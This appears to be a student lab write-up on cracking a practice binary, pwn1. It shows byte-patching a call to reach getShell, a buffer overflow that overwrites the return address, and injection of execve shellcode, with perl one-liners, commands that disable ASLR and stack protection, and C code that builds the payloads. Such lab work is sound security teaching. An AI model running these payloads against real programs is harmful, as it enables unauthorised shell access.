Exp1 PC platform reverse engineering and cracking
Table of contents
- Experiment contents
  - Modify the program's machine instructions directly so that the execution flow jumps straight to the getShell function.
  - Exploit the buffer overflow (BOF) in the function foo: construct an input string that overwrites the return address and triggers the getShell function.
  - Inject self-made shellcode and get the program to run it.
- Experimental procedure and results
- Problems and solutions
- Experiences and thoughts
1. Modify the program's machine instructions directly to change the execution flow
- First download pwn1.zip and unzip it to obtain the file pwn1. Back the file up and name the copy 20175221pwn2.
- Disassemble pwn2 with objdump -d 20175221pwn2, which gives the following code:
- Look at the main function at 80484b5: the byte E8 is the opcode of the call instruction, i.e. the jump to the foo function. Our task is to modify the machine instruction so that a different function is called.
- The target is the getShell function. Its address is 0804847d; the foo function is at 08048491; the difference (hex) is 14.
- The four bytes after E8, "d7 ff ff ff", are the numeric part of the call instruction: a signed displacement that is added to eip (which already points at the next instruction, 80484ba) to get the jump target. d7 ff ff ff is -0x29, and 80484ba - 0x29 = 8048491, the address of foo.
- To change the jump target from foo to getShell, subtract the offset 14 from the byte d7, giving c3 (c3 ff ff ff is -0x3d, and 80484ba - 0x3d = 804847d).
- The steps of the change:
- Open 20175221pwn2 in vi and stay in command mode
- Type :%!xxd to display the file in hexadecimal
- On the bottom line type /e8 d7 (with the space in the middle, because xxd groups the bytes in pairs) to find the corresponding location
- Press i to enter insert mode and change d7 to c3, then press Esc
- Type :%!xxd -r to convert back to the original binary format
- Type :wq to save and exit
- Disassemble 20175221pwn2 again and check that the call instruction now calls getShell
- Running the program then gives a shell prompt
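The arithmetic behind the byte patch, as an added worked example (not code from the original page): it decodes an E8 rel32 call, computes the displacement needed for a new target, and rewrites every call to foo in a code buffer so that it reaches getShell instead. The sample buffer is constructed here from the five call bytes the page shows at 80484b5 plus a bogus E8 that is not a call to foo; the addresses are the ones the page gives.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* x86 "E8 rel32" is a relative call: the CPU adds the signed 32-bit
 * displacement to the address of the NEXT instruction (the call is 5 bytes
 * long), so target = call_vaddr + 5 + rel32. */
uint32_t call_target(uint32_t call_vaddr, int32_t rel32)
{
    return call_vaddr + 5u + (uint32_t)rel32;
}

/* Displacement an E8 at call_vaddr needs in order to reach `target`. */
int32_t rel32_for_target(uint32_t call_vaddr, uint32_t target)
{
    return (int32_t)(target - (call_vaddr + 5u));
}

/* Read a little-endian 32-bit value. */
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Scan a code buffer mapped at base_vaddr and rewrite every E8 whose target
 * is old_target so that it reaches new_target instead. Only the four
 * displacement bytes change, so the instruction keeps its length and nothing
 * after it moves. Matching on the decoded target rather than on the 0xE8
 * opcode alone leaves data bytes that merely look like a call untouched.
 * Returns the number of calls patched. */
int retarget_calls(uint8_t *code, size_t len, uint32_t base_vaddr,
                   uint32_t old_target, uint32_t new_target)
{
    int patched = 0;
    for (size_t i = 0; i + 5 <= len; i++) {
        if (code[i] != 0xE8)
            continue;
        uint32_t vaddr = base_vaddr + (uint32_t)i;
        if (call_target(vaddr, (int32_t)le32(code + i + 1)) != old_target)
            continue;
        uint32_t rel = (uint32_t)rel32_for_target(vaddr, new_target);
        code[i + 1] = (uint8_t)(rel & 0xFF);
        code[i + 2] = (uint8_t)((rel >> 8) & 0xFF);
        code[i + 3] = (uint8_t)((rel >> 16) & 0xFF);
        code[i + 4] = (uint8_t)((rel >> 24) & 0xFF);
        patched++;
    }
    return patched;
}

int main(void)
{
    /* Constructed sample: the call from the page (E8 D7 FF FF FF at 80484b5)
     * followed by a bogus E8 whose target is not foo, to show it is skipped. */
    uint8_t code[] = { 0xE8, 0xD7, 0xFF, 0xFF, 0xFF,  0xE8, 0x00, 0x00, 0x00, 0x00 };
    const uint32_t base = 0x080484B5u, foo = 0x08048491u, getshell = 0x0804847Du;

    printf("original target: %08x\n", call_target(base, (int32_t)le32(code + 1)));
    int n = retarget_calls(code, sizeof code, base, foo, getshell);
    printf("patched %d call(s); bytes now:", n);
    for (size_t i = 0; i < 5; i++)
        printf(" %02x", code[i]);
    printf("\nnew target: %08x\n", call_target(base, (int32_t)le32(code + 1)));
    return 0;
}
```

Applying the same scan to the whole .text section of the binary (file offset = virtual address minus the load address) would patch every call to foo at once; in pwn1 there is only the one in main, which is why editing a single byte in vi is enough.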
2. Construct the input so that a BOF attack changes the program's execution flow
- First analyse the code: the function foo has a buffer overflow vulnerability
- foo reads a string, but the system reserves only a fixed number of bytes of buffer for it; anything beyond that overflows onto the stack. Our goal is to overwrite the return address
- When main executes call foo, it pushes the return address 0x80484ba onto the stack
- Then enter gdb and type a regular string that overflows the buffer (eight 1s, eight 2s, eight 3s, eight 4s, eight 5s)
- info r shows the value of the eip register: four consecutive 5s (ASCII 0x35) landed in eip, which is where the input error shows up
- Replace the original eight 5s with "12345678" to confirm exactly which characters overflow into eip
- We observe "34333231", i.e. "1234" from the original input, in reverse byte order, overflowed into eip. So only the first 32 bytes of input fit before the return address; the 33rd to 36th bytes overwrite it
- Therefore we can enter any 32 bytes, followed by the getShell address 0x0804847d to overwrite the return address. Because storage is little-endian, the four bytes after the 32 bytes should be \x7d\x84\x04\x08
- Next, generate a file containing that string to use as the input. Use perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input to build the input file
- Check with the hex viewer xxd input that the file matches expectations
- Once confirmed, run (cat input; cat) | ./20175221pwn3 to feed the string to the executable. The second cat keeps stdin open after the file has been consumed, so the shell that getShell spawns reads our commands instead of exiting immediately on end of file
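The two steps above, locating the return-address offset from the eip value and then building the input, as an added worked example (not the page's own code). It generalises the page's manual reasoning: the first function searches the probe string for the little-endian bytes of the crashed eip, which is why the page switched from eight 5s (ambiguous: any four of them match) to "12345678"; the second emits the filler plus address plus newline in the layout the perl one-liner uses. The probe string and eip value are the page's; the generator name ./gen in the comments is an assumption.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Given the probe string that was fed to foo and the EIP value gdb showed at
 * the crash, return the offset in the input of the four bytes that landed in
 * the saved return address, or -1 if that value does not occur in the probe.
 * gdb prints eip as a little-endian word, so 0x34333231 means the input bytes
 * '1','2','3','4' in that order. */
int find_eip_offset(const uint8_t *probe, size_t len, uint32_t eip)
{
    uint8_t needle[4] = { (uint8_t)eip, (uint8_t)(eip >> 8),
                          (uint8_t)(eip >> 16), (uint8_t)(eip >> 24) };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(probe + i, needle, 4) == 0)
            return (int)i;
    return -1;
}

/* Build the attack input: `offset` filler bytes (eight 1s, eight 2s, ... as on
 * the page), the target address in little-endian order, then the newline that
 * ends the line read. Returns the payload length, or 0 if `out` is too small. */
size_t build_ret2func_payload(uint8_t *out, size_t cap, size_t offset, uint32_t target)
{
    size_t n = offset + 4 + 1;
    if (cap < n)
        return 0;
    for (size_t i = 0; i < offset; i++)
        out[i] = (uint8_t)('1' + (i / 8) % 8);
    out[offset + 0] = (uint8_t)target;
    out[offset + 1] = (uint8_t)(target >> 8);
    out[offset + 2] = (uint8_t)(target >> 16);
    out[offset + 3] = (uint8_t)(target >> 24);
    out[offset + 4] = '\n';
    return n;
}

int main(void)
{
    /* Constructed: the 40-byte probe from the page and the eip value it produced. */
    const char probe[] = "1111111122222222333333334444444412345678";
    int off = find_eip_offset((const uint8_t *)probe, strlen(probe), 0x34333231u);
    if (off < 0) {
        fprintf(stderr, "eip value not found in probe; use a longer probe\n");
        return 1;
    }
    fprintf(stderr, "return address is at input offset %d\n", off);

    uint8_t payload[64];
    size_t n = build_ret2func_payload(payload, sizeof payload, (size_t)off, 0x0804847Du);
    fwrite(payload, 1, n, stdout);   /* ./gen > input; then (cat input; cat) | ./pwn1 */
    return 0;
}
```

The payload goes to stdout so it can be redirected into the input file and inspected with xxd exactly as the page does; a probe built from distinct 4-byte groups works for any offset, not only 32.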
3. Inject and execute shellcode
- Shellcode is simply a piece of machine code:
- The general purpose of this machine code is to obtain an interactive shell (a shell on Linux, cmd.exe on Windows), which is why such machine code is called shellcode.
- In practice, any machine code that is injected in this way, such as code that adds a user or runs a command, is also called shellcode.
- First make the following settings:

```sh
apt-get install execstack                       # install execstack
execstack -s pwn1                               # mark the stack of pwn1 executable (turn off stack execution protection)
execstack -q pwn1                               # query whether the executable has an executable stack
more /proc/sys/kernel/randomize_va_space        # query whether address randomization is turned off
echo "0" > /proc/sys/kernel/randomize_va_space  # turn off address randomization
more /proc/sys/kernel/randomize_va_space        # confirm that address randomization is turned off
```

- With the preparation done, write the shellcode according to the buffer size: if the buffer is large enough, put the shellcode inside the buffer and point the return address at the buffer; if the buffer is small, put the shellcode after the return address and point the return address at the first byte of the shellcode (this is the layout used below)
- Run pwn1, then open another terminal and use ps -ef | grep pwn1 to find the process; its process number is 3779
- Debug that process with gdb (attach to it), use disassemble foo to disassemble foo, then set a breakpoint at 0x080484a5. Press Enter in the terminal where pwn1 is running, then go back to the gdb terminal and type c to continue. info r esp shows the stack pointer 0xffffd34c; x/16x 0xffffd34c shows the 16 words of memory starting at that address in hexadecimal. Attaching to the already-running process matters: if pwn1 were launched from inside gdb, the extra environment variables gdb sets would shift the stack, and the address read there could be wrong for a bare run
- As the figure shows, the word 01020304 is at address 0xffffd34c, i.e. esp points at the return-address slot that our placeholder bytes overwrote. The injected shellcode therefore begins four bytes after that address, at 0xffffd34c + 0x00000004 = 0xffffd350. Exit gdb.
- Modify the shellcode input that the teacher provided: perl -e 'print "A" x 32; print "\x50\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode. The layout is 32 filler bytes, the return address 0xffffd350 in little-endian order, a NOP sled (\x90), then the shellcode.
- Enter the command (cat input_shellcode; cat) | ./pwn1
- Attack successful!
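The shellcode injection payload, as an added worked example that is not the page's own code. It decodes the 25 shellcode bytes from the perl one-liner instruction by instruction, builds the same layout (filler, return address pointing at esp+4, NOP sled, shellcode) from the esp value read in gdb, and adds the check a practitioner wants before running it: because the read ends at the first newline, any 0x0a byte inside the payload (for example a stack address ending in 0a) would silently truncate it. The offset, esp value and NOP count are the page's; the generator name ./gen is an assumption.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 25-byte Linux/x86 shellcode from the page, decoded. It builds the string
 * "/bin//sh" on the stack and calls execve("/bin//sh", {"/bin//sh", NULL}, NULL). */
const uint8_t SHELLCODE[] = {
    0x31, 0xc0,                     /* xor  eax, eax                        */
    0x50,                           /* push eax        ; string terminator  */
    0x68, 0x2f, 0x2f, 0x73, 0x68,   /* push "//sh"                          */
    0x68, 0x2f, 0x62, 0x69, 0x6e,   /* push "/bin"                          */
    0x89, 0xe3,                     /* mov  ebx, esp   ; ebx = "/bin//sh"   */
    0x50,                           /* push eax        ; argv[1] = NULL     */
    0x53,                           /* push ebx        ; argv[0]            */
    0x89, 0xe1,                     /* mov  ecx, esp   ; ecx = argv         */
    0x31, 0xd2,                     /* xor  edx, edx   ; envp = NULL        */
    0xb0, 0x0b,                     /* mov  al, 11     ; __NR_execve        */
    0xcd, 0x80                      /* int  0x80                            */
};
const size_t SHELLCODE_LEN = sizeof SHELLCODE;

/* Layout used on the page: [offset filler][ret = esp_at_ret + 4][NOP sled][shellcode]\n
 * esp_at_ret is the value of esp when foo executes ret, i.e. the address of
 * the return-address slot itself; the bytes we place after that slot start
 * at esp_at_ret + 4, so that is where the overwritten return address points.
 * Returns the payload length, or 0 if `out` is too small. */
size_t build_shellcode_payload(uint8_t *out, size_t cap, size_t offset,
                               uint32_t esp_at_ret, size_t nops,
                               const uint8_t *sc, size_t sc_len)
{
    size_t n = offset + 4 + nops + sc_len + 1;
    if (cap < n)
        return 0;
    uint32_t ret = esp_at_ret + 4;
    size_t p = 0;
    while (p < offset)
        out[p++] = 'A';
    out[p++] = (uint8_t)ret;
    out[p++] = (uint8_t)(ret >> 8);
    out[p++] = (uint8_t)(ret >> 16);
    out[p++] = (uint8_t)(ret >> 24);
    for (size_t i = 0; i < nops; i++)
        out[p++] = 0x90;   /* landing anywhere in the sled slides into the code */
    memcpy(out + p, sc, sc_len);
    p += sc_len;
    out[p++] = '\n';
    return p;
}

/* The line read stops at the first '\n', so a 0x0a byte anywhere before the
 * final newline truncates the payload (a stack address like 0xffffd30a would).
 * Returns the index of the first offending byte, or -1 if the payload is clean. */
int first_truncating_byte(const uint8_t *payload, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (payload[i] == '\n')
            return (int)i;
    return -1;
}

int main(void)
{
    /* Constructed from the page's values: 32 bytes to the return address,
     * esp = 0xffffd34c at the breakpoint, six NOPs as in the teacher's input. */
    uint8_t payload[128];
    size_t n = build_shellcode_payload(payload, sizeof payload, 32, 0xffffd34cu, 6,
                                       SHELLCODE, SHELLCODE_LEN);
    int bad = first_truncating_byte(payload, n);
    if (n == 0 || bad >= 0) {
        fprintf(stderr, "payload unusable (truncating byte at index %d)\n", bad);
        return 1;
    }
    fwrite(payload, 1, n, stdout);   /* ./gen > input_shellcode; (cat input_shellcode; cat) | ./pwn1 */
    return 0;
}
```

A longer NOP sled buys tolerance if the real esp differs slightly from the value seen in gdb; the return address then only has to land somewhere inside the sled rather than exactly on the first shellcode byte.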
Problems and solutions encountered:
- Question 1: When downloading with apt-get install execstack, I got an E: ....... error (forgot to take a screenshot..).
- Solution to question 1: After a quick search on Baidu I found that VMware was not connected to the Internet, so before starting the third part I fixed Kali's network again and continued the download
- Question 2: In the last, third part, after I finished entering the shellcode and running it, ls always gave an error, and I repeatedly checked whether I had miscalculated or mistyped
- Solution to question 2: Closed the terminal and reopened it. The great "reopen it" method solved the problem that had stuck me for a long time. I'm not sure why (could it be that the shellcode is repeated? Having done question two, does the terminal have to be closed and a new one opened before question three's shellcode will work? I don't know; I hope the teacher can help explain)
Thoughts and experiences:
Feelings and experiences:
- I had studied the principles of compilation and program structure, as well as the content related to machine code instructions, before, but at the time I did not have a particularly deep feeling for it, probably because the theoretical knowledge had no practical application; the stack, registers and the like were still very confusing. Carrying out a buffer overflow attack in person has given me a deeper understanding of the stack: how the stack is overwritten by malicious code, how the overwrite causes the jump, how the jump is executed, and so on. I also learned how to modify machine code, as well as some additional instructions. The harvest is quite large.
What is a vulnerability? What harm does a vulnerability do?
- A vulnerability is a weakness or defect that exists in a system: the system's susceptibility to a specific threat, to a dangerous event, to an attack, or to the threat of such an action.
- From this experiment, I think a buffer overflow vulnerability arises when the program design does not take into account that the input may exceed the allocated stack space, and so it can be exploited by an attacker. By exploiting this vulnerability an attacker can get into the command line and then perform any operation; or leave a back door so that related malicious code or Trojans can be implanted.